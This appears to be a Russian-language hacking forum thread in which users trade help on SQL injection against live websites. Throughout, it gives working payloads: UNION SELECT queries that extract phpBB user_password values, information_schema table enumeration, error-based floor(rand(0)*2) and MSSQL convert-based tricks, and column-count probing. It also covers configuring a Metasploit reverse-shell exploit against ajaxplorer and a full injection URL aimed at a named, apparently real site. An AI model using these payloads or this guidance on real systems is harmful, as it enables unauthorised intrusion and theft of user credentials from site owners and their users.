Все верно, тебе просто по ошибке написали для phpbb2 Для phpbb3 все проще https://rdot.org/forum/showpost.php?p=1143&postcount=2
floor(rand(0)*2) - выражение, которое приводит к ошибке в базе данных, вследствии чего происходит вывод данных.
0x3a - двоеточие. Следующая запись нужна для того, чтобы повторить значение, что вызывает ошибку группировки (повтор записи). функция rand() генерирует кажыдй раз новое значение, которое не совпадает с предыдущим, чтобы значения были предсказуемы (т.е после первого rand идёт 1.241763483026776 и так всегда) ему кидается аргумент, наиболее подходящий для floor. floor берет из полученного значения только его целое, т.е только то, что идет перед . и каждый 2 раз (в случаи с rand(0)) получается одно и то-же значение.Кстати, вместо этой конструкции можно написать rand(rand(0)), что каждый раз будет возвращать одно и то-же , только к выводу уже прибавится полученное значение значение.
Я не видел, что ты писал. Есть еще один способ. https://rdot.org/forum/showpost.php?p=25479&postcount=7
такая проблемка есть запрос +union+select+1,user_password,3,4,5.6,7.8,9,10,11+from+users+limit+0,1--+ в ответе Table 'med.users' doesn't existTable 'med.users' doesn't exist при попытке вывести названия баз ничего не выводит, можно былобы решить проблему взявши вывод в substring но присудствует фильтрация на скобки, что посоветуете?
Переводя с англ. таблица users не существует) Судя по user_password ты ковыряешь phpbb, возможно у таблицы есть префикс, узнай сначало его, если есть information_schema.
вам не кажется что вам еще рановато давать советы в подобных темах? я английский и без вас знаю, а то что в ответе указывается имя БД то тут и дураку станет понятно что она не одна, и поэтому выборку нужно сделать из тругой, а проблема состояла в том что не выходит выбрать имена БД из табле схема, о чём написано в предыдущем моём посте
Не могу разобраться , что куда вставлять. =) exploit 1. RHOST ( вставляем ИП сайта) 2. RPORT ( стандартный идет 80 ) 3. TARGETURL ( вставляем директорию , где ajaxplorer ) 4. VHOST ( Опять вставлять ИП сайта ?) payload( он выбрал автоматически ) это cmd/unix/reverse 5. LHOST ( что поставить? ) (Я ставил ип машины своей) 6. LPORT ( Какой порт поставить ? стандартный тоже 80 или 8080 ? ) target здесь один "0" Пишу exploit , вот что выдает Code: [*] Started reverse double handler [*] Exploit completed, but no session was created. Вот , что пишет и все. Больше ничего не происходит , где я сделал ошибку ?
Привет. Есть скуля в пост запросе, отправляю через тампер дата. Не могу подобрать число столбов: 1'+order+by+100+--+ Unknown column '100' in 'order clause' 1'+order+by+1+--+ Unknown column '1' in 'order clause'
id=15&type='+convert(int,@@version)+' выводит: [Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int. Кто сможет объяснить, как вывести имя таблиц и колонок?
В ответе должен получить что-то типа: UPD Читайте https://rdot.org/forum/showthread.php?t=826, там все расписано.
на запрос id=15&type='+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES)-- получаю [Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'or'.
скулю раскрутил, только вот админку не могу найти( мож кто знает где она? ArxSS и всякие онлайн сканеры не помогают HTML: http://www.scrutineer.ru/results.php?id=0+union+select+1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+17,1+--+
